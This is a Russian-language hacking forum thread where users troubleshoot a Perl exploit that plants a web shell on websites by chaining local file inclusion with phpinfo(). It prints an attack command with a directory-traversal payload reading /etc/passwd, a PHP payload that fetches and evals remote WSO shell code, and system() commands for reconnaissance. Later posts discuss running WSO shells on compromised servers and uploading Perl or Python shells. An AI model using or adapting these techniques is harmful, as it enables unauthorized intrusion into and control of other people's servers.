Старый 07.08.2012, 01:48   #2251
Hok1do
 
Регистрация: 07.08.2012
Сообщений: 5
Репутация: 0
По умолчанию LFI + phpinfo()

Пользуюсь сплоитом от Pashkela, для заливки шелла через phpinfo + LFI.
Юзаю так:
Код:
perl test.pl http://site.com/phpinfo.php http://site.com/modules.php?mod=../../../../etc/passwd%00
В сплоите изменил значение $phpcode (в "GLOBAL SETTINGS") на:
PHP код:
$phpcode 'eval(file_get_contents("http://site.com/wso2.txt"));'
При выполнении 0 реакции... Доходит до пункта "Sending request", и там FAIL...
Что делаю не так?

P.S. Не влияет ли нулевой байт в LFI на работу сплоита?
Hok1do вне форума   Ответить с цитированием
Старый 07.08.2012, 02:05   #2252
Pashkela
 
Аватар для Pashkela
 
Регистрация: 05.07.2010
Сообщений: 1,243
По умолчанию

не влияет, а просто любой другой код работает, который попроще? Например system("uname -a;id;pwd");

?
Pashkela вне форума   Ответить с цитированием
Старый 07.08.2012, 02:12   #2253
Hok1do
 
Регистрация: 07.08.2012
Сообщений: 5
Репутация: 0
По умолчанию

Неа. Он просто проскакивает код и начинает сначала.
Hok1do вне форума   Ответить с цитированием
Старый 07.08.2012, 02:15   #2254
Pashkela
 
Аватар для Pashkela
 
Регистрация: 05.07.2010
Сообщений: 1,243
По умолчанию

еще проще код, типо

echo 12345;

если нет - забудь, или пробуй другие сплойты

PS: такие вещи надо не под виндой тестить + сплойт работает не в 100% случаев

Последний раз редактировалось Pashkela; 07.08.2012 в 02:40..
Pashkela вне форума   Ответить с цитированием
Старый 07.08.2012, 02:39   #2255
Hok1do
 
Регистрация: 07.08.2012
Сообщений: 5
Репутация: 0
По умолчанию

Цитата:
Сообщение от Pashkela Посмотреть сообщение
еще проще код, типо

echo 12345;

если нет - забудь, или пробуй другие сплойты

PS: такие вещи надо не под виндой тестить
Не... не работает даже echo и print А из-за чего это так? Вроде обычный локальный инклюд и phpinfo есть...
Hok1do вне форума   Ответить с цитированием
Старый 07.08.2012, 11:44   #2256
tipsy
 
Аватар для tipsy
 
Регистрация: 11.07.2010
Сообщений: 415
Репутация: 311
По умолчанию

Цитата:
Сообщение от Hok1do Посмотреть сообщение
Не... не работает даже echo и print :( А из-за чего это так? Вроде обычный локальный инклюд и phpinfo есть...
А ты проверял, разворачивает ли phpinfo массив $_FILES[]? (90% что проблема в этом)

Если да, то либо из-за windows (1%), либо из-за наличия проксирования на таргете(9%).
Попробуй работать с линукса, уменьшить значение buffer.

Первые версии сплойта были очень чувствительными к нарушениям контроля буферизации, но, благодаря усовершенствованиям asddas, поздний сплойт генерит столько говна, что часто забивает и проксирование, и кривую клиентскую буферизацию :)

Upd: по скрину видно, что $_FILES не разворачивается.

Последний раз редактировалось tipsy; 07.08.2012 в 16:03..
tipsy вне форума   Ответить с цитированием
Старый 07.08.2012, 18:38   #2257
Hok1do
 
Регистрация: 07.08.2012
Сообщений: 5
Репутация: 0
По умолчанию

tipsy, да ты прав на счет не создаваемого глоб. массива.
А теперь вот такая проблемка:
Line 81:
PHP код:
if ($line =~ m#tmp_name].+(/tmp/php.+)$#) 
P.S. Что за файл он выдает для инклюда - /tmp/name? В phpcode стоит uname -a, шелл я не где не записывал, а он все равно что то выдает... Pashkela?
Hok1do вне форума   Ответить с цитированием
Старый 08.08.2012, 10:55   #2258
Untitled
 
Аватар для Untitled
 
Регистрация: 24.06.2012
Сообщений: 131
Репутация: 30
По умолчанию

На одном из серверов при работе с WSO начала выпадать ошибка (я так и не понял ее смысла):
Цитата:
506 Variant Also Negotiates

A variant for the requested resource
/script.php
is itself a negotiable resource. This indicates a configuration error.
Причем, ошибка выпадает при POST-запросах. Например, отправляем на исполнение код:
Код:
print 'a';
Все нормально, отправляем
Код:
print 'a'; 
print 'b';
506.

При этом
Код:
print 'aaaaaaaaaaaaaaaaaaaaaaa';
нормально отрабатывается, то есть это не ограничение на объем. Какой-то анализатор POST-запросов?
Untitled вне форума   Ответить с цитированием
Старый 08.08.2012, 14:50   #2259
Hok1do
 
Регистрация: 07.08.2012
Сообщений: 5
Репутация: 0
По умолчанию

Я могу ошибаться, но возможно safe_mode=ON? Попробуй залить pl,py шеллы
Hok1do вне форума   Ответить с цитированием
Старый 08.08.2012, 17:48   #2260
Untitled
 
Аватар для Untitled
 
Регистрация: 24.06.2012
Сообщений: 131
Репутация: 30
По умолчанию

Нет, сейф мод отключен, да и до этого все нормально было.
Untitled вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2022, Jelsoft Enterprises Ltd. Перевод: zCarot